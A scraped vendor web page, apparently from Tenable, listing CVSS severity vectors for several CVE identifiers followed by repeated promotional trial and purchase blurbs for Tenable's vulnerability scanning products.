AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C (CVE-2023-5622)

AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C (CVE-2023-5623)

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C (CVE-2023-5624)

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:U/RL:O/RC:C (CVE-2018-25050)

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:O/RC:C (CVE-2021-23445)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:U/RL:O/RC:C (CVE-2023-0465)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:U/RL:O/RC:C (CVE-2023-0466)

AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C (CVE-2023-1255)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C (CVE-2023-2650)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C (CVE-2023-3817)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C (CVE-2023-3446)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C (CVE-2023-38039)

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C (CVE-2023-4807)

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Nessus Professional Free**

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

**NEW - Tenable Nessus Expert  
Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Pro Trial.

**Buy Tenable Nessus Professional**

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

**Buy Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable Lumin**

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable Security Center**

_Formerly Tenable.sc_

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable OT Security**

_Formerly Tenable.ot_

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable Identity Exposure**

_Formerly Tenable.ad_

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Request a Demo of Tenable Cloud Security**

_**Exceptional unified cloud security awaits you!**_

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable Attack Surface Management In Action**

_Formerly Tenable.asm_

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable Attack Surface Management. A representative will be in touch soon.

**Try Tenable Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Tenable Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Tag

#windows